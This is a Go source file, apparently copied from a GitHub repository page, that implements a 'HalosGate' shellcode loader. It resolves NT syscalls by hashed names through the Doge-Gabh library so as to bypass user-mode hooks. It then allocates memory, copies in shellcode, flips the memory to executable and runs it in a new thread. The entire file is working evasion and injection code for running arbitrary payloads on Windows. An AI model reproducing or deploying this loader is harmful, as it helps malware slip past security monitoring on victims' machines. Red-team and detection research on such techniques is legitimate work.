/
halosgate.go
125 lines (108 loc) · 3.1 KB
/
halosgate.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
package loader
import (
"crypto/sha1"
"crypto/sha256"
"encoding/hex"
"fmt"
"github.com/timwhitez/Doge-Gabh/pkg/Gabh"
"syscall"
"unsafe"
"variant/log"
)
const (
NAM = "NtAllocateVirtualMemory"
NPM = "NtProtectVirtualMemory"
NCT = "NtCreateThreadEx"
)
func HalosGate(shellcode []byte) {
// loader
var thisThread = uintptr(0xffffffffffffffff)
vNtAllocateVirtualMemory, err := gabh.MemHgate(str2sha1(NAM), str2sha1)
if err != nil {
log.Fatal(err)
}
vNtProtectVirtualMemory, err := gabh.DiskHgate(Sha256Hex(NPM), Sha256Hex)
if err != nil {
log.Fatal(err)
}
vCreateThread, err := gabh.MemHgate(Sha256Hex(NCT), Sha256Hex)
if err != nil {
log.Fatal(err)
}
vWaitForSingleObject, _, err := gabh.DiskFuncPtr("kernel32.dll", str2sha1("WaitForSingleObject"), str2sha1)
if err != nil {
log.Fatal(err)
}
createThread(shellcode, thisThread, vNtAllocateVirtualMemory, vNtProtectVirtualMemory, vCreateThread, vWaitForSingleObject)
}
func createThread(shellcode []byte, handle uintptr, NtAllocateVirtualMemorySysid, NtProtectVirtualMemorySysid, NtCreateThreadExSysid uint16, vWaitForSingleObject uint64) {
const (
memCommit = uintptr(0x00001000)
memReserve = uintptr(0x00002000)
)
var baseA uintptr
regionsize := uintptr(len(shellcode))
r1, err := gabh.HgSyscall(
NtAllocateVirtualMemorySysid,
handle,
uintptr(unsafe.Pointer(&baseA)),
0,
uintptr(unsafe.Pointer(®ionsize)),
memCommit|memReserve,
syscall.PAGE_READWRITE,
)
if err != nil {
log.Fatalf("1 %s %x", err, r1)
}
memcpy(baseA, shellcode)
var oldProtect uintptr
r1, err = gabh.HgSyscall(
NtProtectVirtualMemorySysid, //NtProtectVirtualMemory
handle,
uintptr(unsafe.Pointer(&baseA)),
uintptr(unsafe.Pointer(®ionsize)),
syscall.PAGE_EXECUTE_READ,
uintptr(unsafe.Pointer(&oldProtect)),
)
if err != nil {
log.Fatalf("1 %s %x", err, r1)
}
var hhosthread uintptr
r1, err = gabh.HgSyscall(
NtCreateThreadExSysid, //NtCreateThreadEx
uintptr(unsafe.Pointer(&hhosthread)), //hthread
0x1FFFFF, //desiredaccess
0, //objattributes
handle, //processhandle
baseA, //lpstartaddress
0, //lpparam
uintptr(0), //createsuspended
0, //zerobits
0, //sizeofstackcommit
0, //sizeofstackreserve
0, //lpbytesbuffer
)
syscall.Syscall(uintptr(vWaitForSingleObject), 2, hhosthread, 0xffffffff, 0)
if err != nil {
log.Fatalf("1 %s %x", err, r1)
}
}
func memcpy(base uintptr, buf []byte) {
for i := 0; i < len(buf); i++ {
*(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i]
}
}
func str2sha1(s string) string {
h := sha1.New()
h.Write([]byte(s))
bs := h.Sum(nil)
return fmt.Sprintf("%x", bs)
}
func Sha256Hex(s string) string {
return hex.EncodeToString(Sha256([]byte(s)))
}
func Sha256(data []byte) []byte {
digest := sha256.New()
digest.Write(data)
return digest.Sum(nil)
}